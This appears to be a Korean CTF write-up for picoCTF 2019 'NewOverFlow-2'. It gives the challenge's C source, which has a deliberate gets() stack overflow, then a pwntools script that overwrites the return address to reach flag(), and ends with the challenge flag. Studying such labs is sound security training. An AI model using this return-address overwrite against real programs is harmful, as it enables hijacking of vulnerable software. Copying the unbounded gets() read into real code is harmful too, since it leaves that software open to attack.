ii4gsp
picoCTF - NewOverFlow-2 본문
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdbool.h>
/* Size in bytes of the stack buffer that vuln() fills with gets(). */
#define BUFFSIZE 64
/* Size in bytes of the buffer flag() reads flag.txt into. */
#define FLAGSIZE 64
/* Set by win_fn1() when it is called with its expected argument. */
bool win1 = false;
/* Set by win_fn2() when win1 is already set and all three arguments match. */
bool win2 = false;
/*
 * First stage of the two-step check: sets the global win1 only when the
 * caller passes the magic value 0xDEADBEEF. Any other argument leaves win1
 * untouched.
 */
void win_fn1(unsigned int arg_check) {
    if (arg_check != 0xDEADBEEF) {
        return;
    }
    win1 = true;
}
/*
 * Second stage of the two-step check: sets the global win2 only when win1 is
 * already set and the three arguments equal 0xBAADCAFE, 0xCAFEBABE and
 * 0xABADBABE, in that order. Otherwise win2 is left untouched.
 */
void win_fn2(unsigned int arg_check1, unsigned int arg_check2, unsigned int arg_check3) {
    bool args_match = arg_check1 == 0xBAADCAFE
                   && arg_check2 == 0xCAFEBABE
                   && arg_check3 == 0xABADBABE;

    if (win1 && args_match) {
        win2 = true;
    }
}
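/*
 * Prints the first line of flag.txt when both win1 and win2 are set,
 * otherwise prints a refusal message. Exits the process with status 0 if
 * flag.txt cannot be opened.
 *
 * main() in this listing never calls this function.
 */
void win_fn() {
    /* Start empty so a failed read can never print uninitialised stack bytes. */
    char flag_text[48] = "";
    FILE *file = fopen("flag.txt", "r");

    if (file == NULL) {
        printf("'flag.txt' missing in the current directory!\n");
        exit(0);
    }

    /* An empty or unreadable file leaves the buffer as an empty string. */
    if (fgets(flag_text, sizeof(flag_text), file) == NULL) {
        flag_text[0] = '\0';
    }
    /* The original never closed the stream. */
    fclose(file);

    if (win1 && win2) {
        printf("%s", flag_text);
        return;
    }
    printf("Nope, not quite...\n");
}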
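/*
 * Prints the first line of flag.txt unconditionally. Exits the process with
 * status 0 if flag.txt cannot be opened.
 *
 * main() in this listing never calls this function.
 */
void flag() {
    /* Start empty so a failed read can never print uninitialised stack bytes. */
    char buf[FLAGSIZE] = "";
    FILE *f = fopen("flag.txt","r");

    if (f == NULL) {
        printf("'flag.txt' missing in the current directory!\n");
        exit(0);
    }

    /* An empty or unreadable file leaves the buffer as an empty string. */
    if (fgets(buf, sizeof buf, f) == NULL) {
        buf[0] = '\0';
    }
    /* The original never closed the stream. */
    fclose(f);

    /*
     * File contents are data, not a format string: the original printf(buf)
     * would interpret any '%' sequences found in flag.txt.
     */
    printf("%s", buf);
}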
/*
 * Reads one line from stdin into a BUFFSIZE-byte (64-byte) stack buffer.
 *
 * gets() takes no length argument: it keeps writing until it sees a newline
 * or EOF, so any line longer than BUFFSIZE - 1 bytes runs past the end of
 * buf and overwrites adjacent stack data. This unbounded write is the defect
 * the write-up on this page is about. gets() was removed from the language in
 * C11; the bounded replacement is fgets(buf, sizeof buf, stdin).
 */
void vuln(){
char buf[BUFFSIZE];
gets(buf);
}
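/*
 * Entry point: switches stdout to unbuffered mode, sets the real, effective
 * and saved group IDs to the current effective GID, prints the banner and
 * hands control to vuln().
 *
 * Returns 0 on the normal path, or 1 if the group IDs could not be changed.
 */
int main(int argc, char **argv){
    (void)argc;
    (void)argv;

    setvbuf(stdout, NULL, _IONBF, 0);

    gid_t gid = getegid();
    /*
     * A failed credential change must not be ignored: continuing would run
     * the rest of the program with a different set of group IDs than
     * intended.
     */
    if (setresgid(gid, gid, gid) != 0) {
        perror("setresgid");
        return 1;
    }

    puts("Welcome to 64-bit. Can you match these numbers?");
    vuln();
    return 0;
}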
vuln() 함수는 gets() 함수로 v1(소스 코드의 buf)에 입력을 받으며, 이 버퍼는 rbp-0x40에 위치한다. gets()는 입력 길이를 검사하지 않으므로, 64바이트 버퍼와 저장된 rbp 8바이트를 합친 72바이트를 넘는 입력은 반환 주소를 덮어쓴다.
vuln() 함수의 반환 주소를 main() 함수의 주소로 덮어쓰고 그 뒤에 flag() 함수의 주소를 두어, main()에 이어 flag()가 실행되도록 하면 된다.
# pwntools script from the write-up: starts the challenge binary over SSH and
# sends it a single crafted input line.
from pwn import *
# SSH session to the picoCTF 2019 shell host; user and password are left blank in the post.
s = ssh(host = '2019shell1.picoctf.com', user = '', password = '')
# Run from the challenge directory, where ./vuln lives.
s.set_working_directory('/problems/newoverflow-2_0_b7d9b3bbdbb843a28a13ff1aa57410df')
p = s.process('./vuln')
# Local copy of the binary, used only to look up symbol addresses.
# NOTE(review): this assumes the local copy matches the remote binary and that it
# is loaded at fixed addresses (not position-independent) — confirm.
e = ELF('/home/ii4gsp/picoCTF/NewOverFlow2')
main = e.symbols['main']
flag = e.symbols['flag']
# NOTE(review): concatenating a str with p64() suggests this was written for
# Python 2; on Python 3 p64() returns bytes, so the filler would need to be bytes too.
payload = ''
# 72 filler bytes, followed by the addresses of main and flag packed as 64-bit values.
payload += '\x90' * 72
payload += p64(main)
payload += p64(flag)
# gets() in vuln() reads this as one line.
p.sendline(payload)
# Hand the session to the terminal to see the program's output.
p.interactive()
Flag: picoCTF{r0p_1t_d0nT_st0p_1t_b1c10cce}